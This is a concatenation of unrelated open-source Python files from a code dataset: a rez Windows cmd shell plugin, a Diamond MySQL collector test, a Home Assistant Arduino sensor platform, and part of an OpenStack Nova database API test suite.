def _bind_interactive_rez(self):
if config.set_prompt and self.settings.prompt:
stored_prompt = os.getenv("REZ_STORED_PROMPT")
curr_prompt = stored_prompt or os.getenv("PROMPT", "")
if not stored_prompt:
self.setenv("REZ_STORED_PROMPT", curr_prompt)
new_prompt = "%%REZ_ENV_PROMPT%%"
new_prompt = (new_prompt + " %s") if config.prefix_prompt \
else ("%s " + new_prompt)
new_prompt = new_prompt % curr_prompt
self._addline('set PROMPT=%s' % new_prompt)
def spawn_shell(self, context_file, tmpdir, rcfile=None, norc=False,
stdin=False, command=None, env=None, quiet=False,
pre_command=None, **Popen_args):
startup_sequence = self.get_startup_sequence(rcfile, norc, bool(stdin), command)
shell_command = None
def _record_shell(ex, files, bind_rez=True, print_msg=False):
ex.source(context_file)
if startup_sequence["envvar"]:
ex.unsetenv(startup_sequence["envvar"])
if bind_rez:
ex.interpreter._bind_interactive_rez()
if print_msg and not quiet:
# ex.info('')
# ex.info('You are now in a rez-configured environment.')
# ex.info('')
if system.is_production_rez_install:
# previously this was called with the /K flag, however
# that would leave spawn_shell hung on a blocked call
# waiting for the user to type "exit" into the shell that
# was spawned to run the rez context printout
ex.command("cmd /Q /C rez context")
def _create_ex():
return RexExecutor(interpreter=self.new_shell(),
parent_environ={},
add_default_namespaces=False)
executor = _create_ex()
if self.settings.prompt:
newprompt = '%%REZ_ENV_PROMPT%%%s' % self.settings.prompt
executor.interpreter._saferefenv('REZ_ENV_PROMPT')
executor.env.REZ_ENV_PROMPT = literal(newprompt)
if startup_sequence["command"] is not None:
_record_shell(executor, files=startup_sequence["files"])
shell_command = startup_sequence["command"]
else:
_record_shell(executor, files=startup_sequence["files"], print_msg=(not quiet))
if shell_command:
executor.command(shell_command)
executor.command('exit %errorlevel%')
code = executor.get_output()
target_file = os.path.join(tmpdir, "rez-shell.%s"
% self.file_extension())
with open(target_file, 'w') as f:
f.write(code)
if startup_sequence["stdin"] and stdin and (stdin is not True):
Popen_args["stdin"] = stdin
cmd = []
if pre_command:
if isinstance(pre_command, basestring):
cmd = pre_command.strip().split()
else:
cmd = pre_command
cmd = cmd + [self.executable, "/Q", "/K", target_file]
p = subprocess.Popen(cmd, env=env, **Popen_args)
return p
def escape_string(self, value):
return value
def _saferefenv(self, key):
pass
def shebang(self):
pass
def setenv(self, key, value):
value = self.escape_string(value)
self._addline('set %s=%s' % (key, value))
def unsetenv(self, key):
self._addline("set %s=" % key)
def resetenv(self, key, value, friends=None):
self._addline(self.setenv(key, value))
def alias(self, key, value):
self._addline("doskey %s=%s" % (key, value))
def comment(self, value):
for line in value.split('\n'):
self._addline(': %s' % line)
def info(self, value):
for line in value.split('\n'):
self._addline('echo %s' % line)
def error(self, value):
for line in value.split('\n'):
self._addline('echo "%s" 1>&2' % line)
def source(self, value):
self._addline("call %s" % value)
def command(self, value):
self._addline(value)
def get_key_token(self, key):
return "%%%s%%" % key
def join(self, command):
return shlex_join(command).replace("'", '"')
def register_plugin():
if platform_.name == "windows":
return CMD
# Copyright 2013-2016 Allan Johns.
#
# This library is free software: you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation, either
# version 3 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library. If not, see <http://www.gnu.org/licenses/>.
| lgpl-3.0 | 6,841,379,534,693,779,000 | 33.607595 | 171 | 0.570105 | false |
disqus/Diamond | src/collectors/mysql/test/testmysql.py | 6 | 4231 | #!/usr/bin/python
# coding=utf-8
################################################################################
from test import CollectorTestCase
from test import get_collector_config
from test import unittest
from test import run_only
from mock import Mock
from mock import patch
from diamond.collector import Collector
from mysql import MySQLCollector
################################################################################
def run_only_if_MySQLdb_is_available(func):
try:
import MySQLdb
MySQLdb # workaround for pyflakes issue #13
except ImportError:
MySQLdb = None
pred = lambda: MySQLdb is not None
return run_only(func, pred)
class TestMySQLCollector(CollectorTestCase):
def setUp(self):
config = get_collector_config('MySQLCollector', {
'slave': 'True',
'master': 'True',
'innodb': 'True',
'hosts': ['root:@localhost:3306/mysql'],
'interval': '1',
})
self.collector = MySQLCollector(config, None)
def test_import(self):
self.assertTrue(MySQLCollector)
@run_only_if_MySQLdb_is_available
@patch.object(MySQLCollector, 'connect', Mock(return_value=True))
@patch.object(MySQLCollector, 'disconnect', Mock(return_value=True))
@patch.object(Collector, 'publish')
def test_real_data(self, publish_mock):
p_global_status = patch.object(
MySQLCollector,
'get_db_global_status',
Mock(return_value=self.getPickledResults(
'mysql_get_db_global_status_1.pkl')))
p_master_status = patch.object(
MySQLCollector,
'get_db_master_status',
Mock(return_value=self.getPickledResults(
'get_db_master_status_1.pkl')))
p_slave_status = patch.object(
MySQLCollector,
'get_db_slave_status',
Mock(return_value=self.getPickledResults(
'get_db_slave_status_1.pkl')))
p_innodb_status = patch.object(
MySQLCollector,
'get_db_innodb_status',
Mock(return_value=[{}]))
p_global_status.start()
p_master_status.start()
p_slave_status.start()
p_innodb_status.start()
self.collector.collect()
p_global_status.stop()
p_master_status.stop()
p_slave_status.stop()
p_innodb_status.stop()
self.assertPublishedMany(publish_mock, {})
p_global_status = patch.object(
MySQLCollector,
'get_db_global_status',
Mock(return_value=self.getPickledResults(
'mysql_get_db_global_status_2.pkl')))
p_master_status = patch.object(
MySQLCollector,
'get_db_master_status',
Mock(return_value=self.getPickledResults(
'get_db_master_status_2.pkl')))
p_slave_status = patch.object(
MySQLCollector,
'get_db_slave_status',
Mock(return_value=self.getPickledResults(
'get_db_slave_status_2.pkl')))
p_innodb_status = patch.object(
MySQLCollector,
'get_db_innodb_status',
Mock(return_value=[{}]))
p_global_status.start()
p_master_status.start()
p_slave_status.start()
p_innodb_status.start()
self.collector.collect()
p_global_status.stop()
p_master_status.stop()
p_slave_status.stop()
p_innodb_status.stop()
metrics = {}
metrics.update(self.getPickledResults(
'mysql_get_db_global_status_expected.pkl'))
metrics.update(self.getPickledResults(
'get_db_master_status_expected.pkl'))
metrics.update(self.getPickledResults(
'get_db_slave_status_expected.pkl'))
self.assertPublishedMany(publish_mock, metrics)
self.setDocExample(collector=self.collector.__class__.__name__,
metrics=metrics,
defaultpath=self.collector.config['path'])
################################################################################
if __name__ == "__main__":
unittest.main()
| mit | 3,490,338,835,165,256,700 | 32.314961 | 80 | 0.552352 | false |
GenericStudent/home-assistant | homeassistant/components/arduino/sensor.py | 9 | 1619 | """Support for getting information from Arduino pins."""
import voluptuous as vol
from homeassistant.components.sensor import PLATFORM_SCHEMA
from homeassistant.const import CONF_NAME
import homeassistant.helpers.config_validation as cv
from homeassistant.helpers.entity import Entity
from . import DOMAIN
CONF_PINS = "pins"
CONF_TYPE = "analog"
PIN_SCHEMA = vol.Schema({vol.Required(CONF_NAME): cv.string})
PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend(
{vol.Required(CONF_PINS): vol.Schema({cv.positive_int: PIN_SCHEMA})}
)
def setup_platform(hass, config, add_entities, discovery_info=None):
"""Set up the Arduino platform."""
board = hass.data[DOMAIN]
pins = config[CONF_PINS]
sensors = []
for pinnum, pin in pins.items():
sensors.append(ArduinoSensor(pin.get(CONF_NAME), pinnum, CONF_TYPE, board))
add_entities(sensors)
class ArduinoSensor(Entity):
"""Representation of an Arduino Sensor."""
def __init__(self, name, pin, pin_type, board):
"""Initialize the sensor."""
self._pin = pin
self._name = name
self.pin_type = pin_type
self.direction = "in"
self._value = None
board.set_mode(self._pin, self.direction, self.pin_type)
self._board = board
@property
def state(self):
"""Return the state of the sensor."""
return self._value
@property
def name(self):
"""Get the name of the sensor."""
return self._name
def update(self):
"""Get the latest value from the pin."""
self._value = self._board.get_analog_inputs()[self._pin][1]
| apache-2.0 | -3,335,557,974,952,929,000 | 26.440678 | 83 | 0.652872 | false |
JioCloud/nova_test_latest | nova/tests/unit/db/test_db_api.py | 5 | 388540 | # encoding=UTF8
# Copyright 2010 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Unit tests for the DB API."""
import copy
import datetime
import uuid as stdlib_uuid
import iso8601
import mock
import netaddr
from oslo_config import cfg
from oslo_db import api as oslo_db_api
from oslo_db import exception as db_exc
from oslo_db.sqlalchemy import test_base
from oslo_db.sqlalchemy import utils as sqlalchemyutils
from oslo_serialization import jsonutils
from oslo_utils import timeutils
from oslo_utils import uuidutils
import six
from six.moves import range
from sqlalchemy import Column
from sqlalchemy.dialects import sqlite
from sqlalchemy.exc import OperationalError
from sqlalchemy.exc import SQLAlchemyError
from sqlalchemy import inspect
from sqlalchemy import Integer
from sqlalchemy import MetaData
from sqlalchemy.orm import query
from sqlalchemy import sql
from sqlalchemy import Table
from nova import block_device
from nova.compute import arch
from nova.compute import vm_states
from nova import context
from nova import db
from nova.db.sqlalchemy import api as sqlalchemy_api
from nova.db.sqlalchemy import models
from nova.db.sqlalchemy import types as col_types
from nova.db.sqlalchemy import utils as db_utils
from nova import exception
from nova import objects
from nova import quota
from nova import test
from nova.tests.unit import matchers
from nova import utils
CONF = cfg.CONF
CONF.import_opt('reserved_host_memory_mb', 'nova.compute.resource_tracker')
CONF.import_opt('reserved_host_disk_mb', 'nova.compute.resource_tracker')
get_engine = sqlalchemy_api.get_engine
get_session = sqlalchemy_api.get_session
def _reservation_get(context, uuid):
result = sqlalchemy_api.model_query(context, models.Reservation,
read_deleted="no").filter_by(uuid=uuid).first()
if not result:
raise exception.ReservationNotFound(uuid=uuid)
return result
def _quota_reserve(context, project_id, user_id):
"""Create sample Quota, QuotaUsage and Reservation objects.
There is no method db.quota_usage_create(), so we have to use
db.quota_reserve() for creating QuotaUsage objects.
Returns reservations uuids.
"""
def get_sync(resource, usage):
def sync(elevated, project_id, user_id, session):
return {resource: usage}
return sync
quotas = {}
user_quotas = {}
resources = {}
deltas = {}
for i in range(3):
resource = 'resource%d' % i
if i == 2:
# test for project level resources
resource = 'fixed_ips'
quotas[resource] = db.quota_create(context,
project_id,
resource, i + 2).hard_limit
user_quotas[resource] = quotas[resource]
else:
quotas[resource] = db.quota_create(context,
project_id,
resource, i + 1).hard_limit
user_quotas[resource] = db.quota_create(context, project_id,
resource, i + 1,
user_id=user_id).hard_limit
sync_name = '_sync_%s' % resource
resources[resource] = quota.ReservableResource(
resource, sync_name, 'quota_res_%d' % i)
deltas[resource] = i
setattr(sqlalchemy_api, sync_name, get_sync(resource, i))
sqlalchemy_api.QUOTA_SYNC_FUNCTIONS[sync_name] = getattr(
sqlalchemy_api, sync_name)
return db.quota_reserve(context, resources, quotas, user_quotas, deltas,
timeutils.utcnow(), CONF.until_refresh,
datetime.timedelta(days=1), project_id, user_id)
class DbTestCase(test.TestCase):
def setUp(self):
super(DbTestCase, self).setUp()
self.user_id = 'fake'
self.project_id = 'fake'
self.context = context.RequestContext(self.user_id, self.project_id)
def create_instance_with_args(self, **kwargs):
args = {'reservation_id': 'a', 'image_ref': 1, 'host': 'host1',
'node': 'node1', 'project_id': self.project_id,
'vm_state': 'fake'}
if 'context' in kwargs:
ctxt = kwargs.pop('context')
args['project_id'] = ctxt.project_id
else:
ctxt = self.context
args.update(kwargs)
return db.instance_create(ctxt, args)
def fake_metadata(self, content):
meta = {}
for i in range(0, 10):
meta["foo%i" % i] = "this is %s item %i" % (content, i)
return meta
def create_metadata_for_instance(self, instance_uuid):
meta = self.fake_metadata('metadata')
db.instance_metadata_update(self.context, instance_uuid, meta, False)
sys_meta = self.fake_metadata('system_metadata')
db.instance_system_metadata_update(self.context, instance_uuid,
sys_meta, False)
return meta, sys_meta
class DecoratorTestCase(test.TestCase):
def _test_decorator_wraps_helper(self, decorator):
def test_func():
"""Test docstring."""
decorated_func = decorator(test_func)
self.assertEqual(test_func.__name__, decorated_func.__name__)
self.assertEqual(test_func.__doc__, decorated_func.__doc__)
self.assertEqual(test_func.__module__, decorated_func.__module__)
def test_require_context_decorator_wraps_functions_properly(self):
self._test_decorator_wraps_helper(sqlalchemy_api.require_context)
def test_require_admin_context_decorator_wraps_functions_properly(self):
self._test_decorator_wraps_helper(sqlalchemy_api.require_admin_context)
def test_require_deadlock_retry_wraps_functions_properly(self):
self._test_decorator_wraps_helper(
oslo_db_api.wrap_db_retry(max_retries=5, retry_on_deadlock=True))
def _get_fake_aggr_values():
return {'name': 'fake_aggregate'}
def _get_fake_aggr_metadata():
return {'fake_key1': 'fake_value1',
'fake_key2': 'fake_value2',
'availability_zone': 'fake_avail_zone'}
def _get_fake_aggr_hosts():
return ['foo.openstack.org']
def _create_aggregate(context=context.get_admin_context(),
values=_get_fake_aggr_values(),
metadata=_get_fake_aggr_metadata()):
return db.aggregate_create(context, values, metadata)
def _create_aggregate_with_hosts(context=context.get_admin_context(),
values=_get_fake_aggr_values(),
metadata=_get_fake_aggr_metadata(),
hosts=_get_fake_aggr_hosts()):
result = _create_aggregate(context=context,
values=values, metadata=metadata)
for host in hosts:
db.aggregate_host_add(context, result['id'], host)
return result
@mock.patch.object(sqlalchemy_api, '_get_regexp_op_for_connection',
return_value='LIKE')
class UnsupportedDbRegexpTestCase(DbTestCase):
def test_instance_get_all_by_filters_paginate(self, mock_get_regexp):
test1 = self.create_instance_with_args(display_name='test1')
test2 = self.create_instance_with_args(display_name='test2')
test3 = self.create_instance_with_args(display_name='test3')
result = db.instance_get_all_by_filters(self.context,
{'display_name': '%test%'},
marker=None)
self.assertEqual(3, len(result))
result = db.instance_get_all_by_filters(self.context,
{'display_name': '%test%'},
sort_dir="asc",
marker=test1['uuid'])
self.assertEqual(2, len(result))
result = db.instance_get_all_by_filters(self.context,
{'display_name': '%test%'},
sort_dir="asc",
marker=test2['uuid'])
self.assertEqual(1, len(result))
result = db.instance_get_all_by_filters(self.context,
{'display_name': '%test%'},
sort_dir="asc",
marker=test3['uuid'])
self.assertEqual(0, len(result))
self.assertRaises(exception.MarkerNotFound,
db.instance_get_all_by_filters,
self.context, {'display_name': '%test%'},
marker=str(stdlib_uuid.uuid4()))
def _assert_equals_inst_order(self, correct_order, filters,
sort_keys=None, sort_dirs=None,
limit=None, marker=None,
match_keys=['uuid', 'vm_state',
'display_name', 'id']):
'''Retrieves instances based on the given filters and sorting
information and verifies that the instances are returned in the
correct sorted order by ensuring that the supplied keys match.
'''
result = db.instance_get_all_by_filters_sort(
self.context, filters, limit=limit, marker=marker,
sort_keys=sort_keys, sort_dirs=sort_dirs)
self.assertEqual(len(correct_order), len(result))
for inst1, inst2 in zip(result, correct_order):
for key in match_keys:
self.assertEqual(inst1.get(key), inst2.get(key))
return result
def test_instance_get_all_by_filters_sort_keys(self, mock_get_regexp):
'''Verifies sort order and direction for multiple instances.'''
# Instances that will reply to the query
test1_active = self.create_instance_with_args(
display_name='test1',
vm_state=vm_states.ACTIVE)
test1_error = self.create_instance_with_args(
display_name='test1',
vm_state=vm_states.ERROR)
test1_error2 = self.create_instance_with_args(
display_name='test1',
vm_state=vm_states.ERROR)
test2_active = self.create_instance_with_args(
display_name='test2',
vm_state=vm_states.ACTIVE)
test2_error = self.create_instance_with_args(
display_name='test2',
vm_state=vm_states.ERROR)
test2_error2 = self.create_instance_with_args(
display_name='test2',
vm_state=vm_states.ERROR)
# Other instances in the DB, will not match name filter
other_error = self.create_instance_with_args(
display_name='other',
vm_state=vm_states.ERROR)
other_active = self.create_instance_with_args(
display_name='other',
vm_state=vm_states.ACTIVE)
filters = {'display_name': '%test%'}
# Verify different sort key/direction combinations
sort_keys = ['display_name', 'vm_state', 'created_at']
sort_dirs = ['asc', 'asc', 'asc']
correct_order = [test1_active, test1_error, test1_error2,
test2_active, test2_error, test2_error2]
self._assert_equals_inst_order(correct_order, filters,
sort_keys=sort_keys,
sort_dirs=sort_dirs)
sort_dirs = ['asc', 'desc', 'asc']
correct_order = [test1_error, test1_error2, test1_active,
test2_error, test2_error2, test2_active]
self._assert_equals_inst_order(correct_order, filters,
sort_keys=sort_keys,
sort_dirs=sort_dirs)
sort_dirs = ['desc', 'desc', 'asc']
correct_order = [test2_error, test2_error2, test2_active,
test1_error, test1_error2, test1_active]
self._assert_equals_inst_order(correct_order, filters,
sort_keys=sort_keys,
sort_dirs=sort_dirs)
# created_at is added by default if not supplied, descending order
sort_keys = ['display_name', 'vm_state']
sort_dirs = ['desc', 'desc']
correct_order = [test2_error2, test2_error, test2_active,
test1_error2, test1_error, test1_active]
self._assert_equals_inst_order(correct_order, filters,
sort_keys=sort_keys,
sort_dirs=sort_dirs)
# Now created_at should be in ascending order (defaults to the first
# sort dir direction)
sort_dirs = ['asc', 'asc']
correct_order = [test1_active, test1_error, test1_error2,
test2_active, test2_error, test2_error2]
self._assert_equals_inst_order(correct_order, filters,
sort_keys=sort_keys,
sort_dirs=sort_dirs)
# Remove name filter, get all instances
correct_order = [other_active, other_error,
test1_active, test1_error, test1_error2,
test2_active, test2_error, test2_error2]
self._assert_equals_inst_order(correct_order, {},
sort_keys=sort_keys,
sort_dirs=sort_dirs)
# Default sorting, 'created_at' then 'id' in desc order
correct_order = [other_active, other_error,
test2_error2, test2_error, test2_active,
test1_error2, test1_error, test1_active]
self._assert_equals_inst_order(correct_order, {})
def test_instance_get_all_by_filters_sort_keys_paginate(self,
mock_get_regexp):
'''Verifies sort order with pagination.'''
# Instances that will reply to the query
test1_active = self.create_instance_with_args(
display_name='test1',
vm_state=vm_states.ACTIVE)
test1_error = self.create_instance_with_args(
display_name='test1',
vm_state=vm_states.ERROR)
test1_error2 = self.create_instance_with_args(
display_name='test1',
vm_state=vm_states.ERROR)
test2_active = self.create_instance_with_args(
display_name='test2',
vm_state=vm_states.ACTIVE)
test2_error = self.create_instance_with_args(
display_name='test2',
vm_state=vm_states.ERROR)
test2_error2 = self.create_instance_with_args(
display_name='test2',
vm_state=vm_states.ERROR)
# Other instances in the DB, will not match name filter
self.create_instance_with_args(display_name='other')
self.create_instance_with_args(display_name='other')
filters = {'display_name': '%test%'}
# Common sort information for every query
sort_keys = ['display_name', 'vm_state', 'created_at']
sort_dirs = ['asc', 'desc', 'asc']
# Overall correct instance order based on the sort keys
correct_order = [test1_error, test1_error2, test1_active,
test2_error, test2_error2, test2_active]
# Limits of 1, 2, and 3, verify that the instances returned are in the
# correct sorted order, update the marker to get the next correct page
for limit in range(1, 4):
marker = None
# Include the maximum number of instances (ie, 6) to ensure that
# the last query (with marker pointing to the last instance)
# returns 0 servers
for i in range(0, 7, limit):
if i == len(correct_order):
correct = []
else:
correct = correct_order[i:i + limit]
insts = self._assert_equals_inst_order(
correct, filters,
sort_keys=sort_keys, sort_dirs=sort_dirs,
limit=limit, marker=marker)
if correct:
marker = insts[-1]['uuid']
self.assertEqual(correct[-1]['uuid'], marker)
def test_instance_get_deleted_by_filters_sort_keys_paginate(self,
mock_get_regexp):
'''Verifies sort order with pagination for deleted instances.'''
ctxt = context.get_admin_context()
# Instances that will reply to the query
test1_active = self.create_instance_with_args(
display_name='test1',
vm_state=vm_states.ACTIVE)
db.instance_destroy(ctxt, test1_active['uuid'])
test1_error = self.create_instance_with_args(
display_name='test1',
vm_state=vm_states.ERROR)
db.instance_destroy(ctxt, test1_error['uuid'])
test1_error2 = self.create_instance_with_args(
display_name='test1',
vm_state=vm_states.ERROR)
db.instance_destroy(ctxt, test1_error2['uuid'])
test2_active = self.create_instance_with_args(
display_name='test2',
vm_state=vm_states.ACTIVE)
db.instance_destroy(ctxt, test2_active['uuid'])
test2_error = self.create_instance_with_args(
display_name='test2',
vm_state=vm_states.ERROR)
db.instance_destroy(ctxt, test2_error['uuid'])
test2_error2 = self.create_instance_with_args(
display_name='test2',
vm_state=vm_states.ERROR)
db.instance_destroy(ctxt, test2_error2['uuid'])
# Other instances in the DB, will not match name filter
self.create_instance_with_args(display_name='other')
self.create_instance_with_args(display_name='other')
filters = {'display_name': '%test%', 'deleted': True}
# Common sort information for every query
sort_keys = ['display_name', 'vm_state', 'created_at']
sort_dirs = ['asc', 'desc', 'asc']
# Overall correct instance order based on the sort keys
correct_order = [test1_error, test1_error2, test1_active,
test2_error, test2_error2, test2_active]
# Limits of 1, 2, and 3, verify that the instances returned are in the
# correct sorted order, update the marker to get the next correct page
for limit in range(1, 4):
marker = None
# Include the maximum number of instances (ie, 6) to ensure that
# the last query (with marker pointing to the last instance)
# returns 0 servers
for i in range(0, 7, limit):
if i == len(correct_order):
correct = []
else:
correct = correct_order[i:i + limit]
insts = self._assert_equals_inst_order(
correct, filters,
sort_keys=sort_keys, sort_dirs=sort_dirs,
limit=limit, marker=marker)
if correct:
marker = insts[-1]['uuid']
self.assertEqual(correct[-1]['uuid'], marker)
class ModelQueryTestCase(DbTestCase):
def test_model_query_invalid_arguments(self):
# read_deleted shouldn't accept invalid values
self.assertRaises(ValueError, sqlalchemy_api.model_query,
self.context, models.Instance, read_deleted=False)
self.assertRaises(ValueError, sqlalchemy_api.model_query,
self.context, models.Instance, read_deleted="foo")
# Check model is a valid model
self.assertRaises(TypeError, sqlalchemy_api.model_query,
self.context, "")
@mock.patch.object(sqlalchemy_api, 'get_session')
def test_model_query_use_slave_false(self, mock_get_session):
sqlalchemy_api.model_query(self.context, models.Instance,
use_slave=False)
mock_get_session.assert_called_once_with(use_slave=False)
@mock.patch.object(sqlalchemy_api, 'get_session')
def test_model_query_use_slave_no_slave_connection(self, mock_get_session):
self.flags(slave_connection='', group='database')
sqlalchemy_api.model_query(self.context, models.Instance,
use_slave=True)
mock_get_session.assert_called_once_with(use_slave=False)
@mock.patch.object(sqlalchemy_api, 'get_session')
def test_model_query_use_slave_true(self, mock_get_session):
self.flags(slave_connection='foo://bar', group='database')
sqlalchemy_api.model_query(self.context, models.Instance,
use_slave=True)
mock_get_session.assert_called_once_with(use_slave=True)
@mock.patch.object(sqlalchemy_api, 'get_session')
def test_model_query_lazy_session_default(self, mock_get_session):
sqlalchemy_api.model_query(self.context, models.Instance,
session=mock.MagicMock())
self.assertFalse(mock_get_session.called)
class AggregateDBApiTestCase(test.TestCase):
def setUp(self):
super(AggregateDBApiTestCase, self).setUp()
self.user_id = 'fake'
self.project_id = 'fake'
self.context = context.RequestContext(self.user_id, self.project_id)
def test_aggregate_create_no_metadata(self):
result = _create_aggregate(metadata=None)
self.assertEqual(result['name'], 'fake_aggregate')
def test_aggregate_create_avoid_name_conflict(self):
r1 = _create_aggregate(metadata=None)
db.aggregate_delete(context.get_admin_context(), r1['id'])
values = {'name': r1['name']}
metadata = {'availability_zone': 'new_zone'}
r2 = _create_aggregate(values=values, metadata=metadata)
self.assertEqual(r2['name'], values['name'])
self.assertEqual(r2['availability_zone'],
metadata['availability_zone'])
def test_aggregate_create_raise_exist_exc(self):
_create_aggregate(metadata=None)
self.assertRaises(exception.AggregateNameExists,
_create_aggregate, metadata=None)
def test_aggregate_get_raise_not_found(self):
ctxt = context.get_admin_context()
# this does not exist!
aggregate_id = 1
self.assertRaises(exception.AggregateNotFound,
db.aggregate_get,
ctxt, aggregate_id)
def test_aggregate_metadata_get_raise_not_found(self):
ctxt = context.get_admin_context()
# this does not exist!
aggregate_id = 1
self.assertRaises(exception.AggregateNotFound,
db.aggregate_metadata_get,
ctxt, aggregate_id)
def test_aggregate_create_with_metadata(self):
ctxt = context.get_admin_context()
result = _create_aggregate(context=ctxt)
expected_metadata = db.aggregate_metadata_get(ctxt, result['id'])
self.assertThat(expected_metadata,
matchers.DictMatches(_get_fake_aggr_metadata()))
def test_aggregate_create_delete_create_with_metadata(self):
# test for bug 1052479
ctxt = context.get_admin_context()
result = _create_aggregate(context=ctxt)
expected_metadata = db.aggregate_metadata_get(ctxt, result['id'])
self.assertThat(expected_metadata,
matchers.DictMatches(_get_fake_aggr_metadata()))
db.aggregate_delete(ctxt, result['id'])
result = _create_aggregate(metadata={'availability_zone':
'fake_avail_zone'})
expected_metadata = db.aggregate_metadata_get(ctxt, result['id'])
self.assertEqual(expected_metadata, {'availability_zone':
'fake_avail_zone'})
def test_aggregate_get(self):
ctxt = context.get_admin_context()
result = _create_aggregate_with_hosts(context=ctxt)
expected = db.aggregate_get(ctxt, result['id'])
self.assertEqual(_get_fake_aggr_hosts(), expected['hosts'])
self.assertEqual(_get_fake_aggr_metadata(), expected['metadetails'])
def test_aggregate_get_by_host(self):
ctxt = context.get_admin_context()
values2 = {'name': 'fake_aggregate2'}
values3 = {'name': 'fake_aggregate3'}
values4 = {'name': 'fake_aggregate4'}
values5 = {'name': 'fake_aggregate5'}
a1 = _create_aggregate_with_hosts(context=ctxt)
a2 = _create_aggregate_with_hosts(context=ctxt, values=values2)
# a3 has no hosts and should not be in the results.
_create_aggregate(context=ctxt, values=values3)
# a4 has no matching hosts.
_create_aggregate_with_hosts(context=ctxt, values=values4,
hosts=['foo4.openstack.org'])
# a5 has no matching hosts after deleting the only matching host.
a5 = _create_aggregate_with_hosts(context=ctxt, values=values5,
hosts=['foo5.openstack.org', 'foo.openstack.org'])
db.aggregate_host_delete(ctxt, a5['id'],
'foo.openstack.org')
r1 = db.aggregate_get_by_host(ctxt, 'foo.openstack.org')
self.assertEqual([a1['id'], a2['id']], [x['id'] for x in r1])
def test_aggregate_get_by_host_with_key(self):
ctxt = context.get_admin_context()
values2 = {'name': 'fake_aggregate2'}
values3 = {'name': 'fake_aggregate3'}
values4 = {'name': 'fake_aggregate4'}
a1 = _create_aggregate_with_hosts(context=ctxt,
metadata={'goodkey': 'good'})
_create_aggregate_with_hosts(context=ctxt, values=values2)
_create_aggregate(context=ctxt, values=values3)
_create_aggregate_with_hosts(context=ctxt, values=values4,
hosts=['foo4.openstack.org'], metadata={'goodkey': 'bad'})
# filter result by key
r1 = db.aggregate_get_by_host(ctxt, 'foo.openstack.org', key='goodkey')
self.assertEqual([a1['id']], [x['id'] for x in r1])
def test_aggregate_metadata_get_by_host(self):
ctxt = context.get_admin_context()
values = {'name': 'fake_aggregate2'}
values2 = {'name': 'fake_aggregate3'}
_create_aggregate_with_hosts(context=ctxt)
_create_aggregate_with_hosts(context=ctxt, values=values)
_create_aggregate_with_hosts(context=ctxt, values=values2,
hosts=['bar.openstack.org'], metadata={'badkey': 'bad'})
r1 = db.aggregate_metadata_get_by_host(ctxt, 'foo.openstack.org')
self.assertEqual(r1['fake_key1'], set(['fake_value1']))
self.assertNotIn('badkey', r1)
def test_aggregate_metadata_get_by_host_with_key(self):
ctxt = context.get_admin_context()
values2 = {'name': 'fake_aggregate12'}
values3 = {'name': 'fake_aggregate23'}
a2_hosts = ['foo1.openstack.org', 'foo2.openstack.org']
a2_metadata = {'good': 'value12', 'bad': 'badvalue12'}
a3_hosts = ['foo2.openstack.org', 'foo3.openstack.org']
a3_metadata = {'good': 'value23', 'bad': 'badvalue23'}
_create_aggregate_with_hosts(context=ctxt)
_create_aggregate_with_hosts(context=ctxt, values=values2,
hosts=a2_hosts, metadata=a2_metadata)
a3 = _create_aggregate_with_hosts(context=ctxt, values=values3,
hosts=a3_hosts, metadata=a3_metadata)
r1 = db.aggregate_metadata_get_by_host(ctxt, 'foo2.openstack.org',
key='good')
self.assertEqual(r1['good'], set(['value12', 'value23']))
self.assertNotIn('fake_key1', r1)
self.assertNotIn('bad', r1)
# Delete metadata
db.aggregate_metadata_delete(ctxt, a3['id'], 'good')
r2 = db.aggregate_metadata_get_by_host(ctxt, 'foo3.openstack.org',
key='good')
self.assertNotIn('good', r2)
def test_aggregate_get_by_host_not_found(self):
ctxt = context.get_admin_context()
_create_aggregate_with_hosts(context=ctxt)
self.assertEqual([], db.aggregate_get_by_host(ctxt, 'unknown_host'))
def test_aggregate_delete_raise_not_found(self):
ctxt = context.get_admin_context()
# this does not exist!
aggregate_id = 1
self.assertRaises(exception.AggregateNotFound,
db.aggregate_delete,
ctxt, aggregate_id)
def test_aggregate_delete(self):
ctxt = context.get_admin_context()
result = _create_aggregate(context=ctxt, metadata=None)
db.aggregate_delete(ctxt, result['id'])
expected = db.aggregate_get_all(ctxt)
self.assertEqual(0, len(expected))
aggregate = db.aggregate_get(ctxt.elevated(read_deleted='yes'),
result['id'])
self.assertEqual(aggregate['deleted'], result['id'])
def test_aggregate_update(self):
ctxt = context.get_admin_context()
result = _create_aggregate(context=ctxt, metadata={'availability_zone':
'fake_avail_zone'})
self.assertEqual(result['availability_zone'], 'fake_avail_zone')
new_values = _get_fake_aggr_values()
new_values['availability_zone'] = 'different_avail_zone'
updated = db.aggregate_update(ctxt, result['id'], new_values)
self.assertNotEqual(result['availability_zone'],
updated['availability_zone'])
def test_aggregate_update_with_metadata(self):
ctxt = context.get_admin_context()
result = _create_aggregate(context=ctxt, metadata=None)
values = _get_fake_aggr_values()
values['metadata'] = _get_fake_aggr_metadata()
values['availability_zone'] = 'different_avail_zone'
expected_metadata = copy.deepcopy(values['metadata'])
expected_metadata['availability_zone'] = values['availability_zone']
db.aggregate_update(ctxt, result['id'], values)
metadata = db.aggregate_metadata_get(ctxt, result['id'])
updated = db.aggregate_get(ctxt, result['id'])
self.assertThat(metadata,
matchers.DictMatches(expected_metadata))
self.assertNotEqual(result['availability_zone'],
updated['availability_zone'])
def test_aggregate_update_with_existing_metadata(self):
ctxt = context.get_admin_context()
result = _create_aggregate(context=ctxt)
values = _get_fake_aggr_values()
values['metadata'] = _get_fake_aggr_metadata()
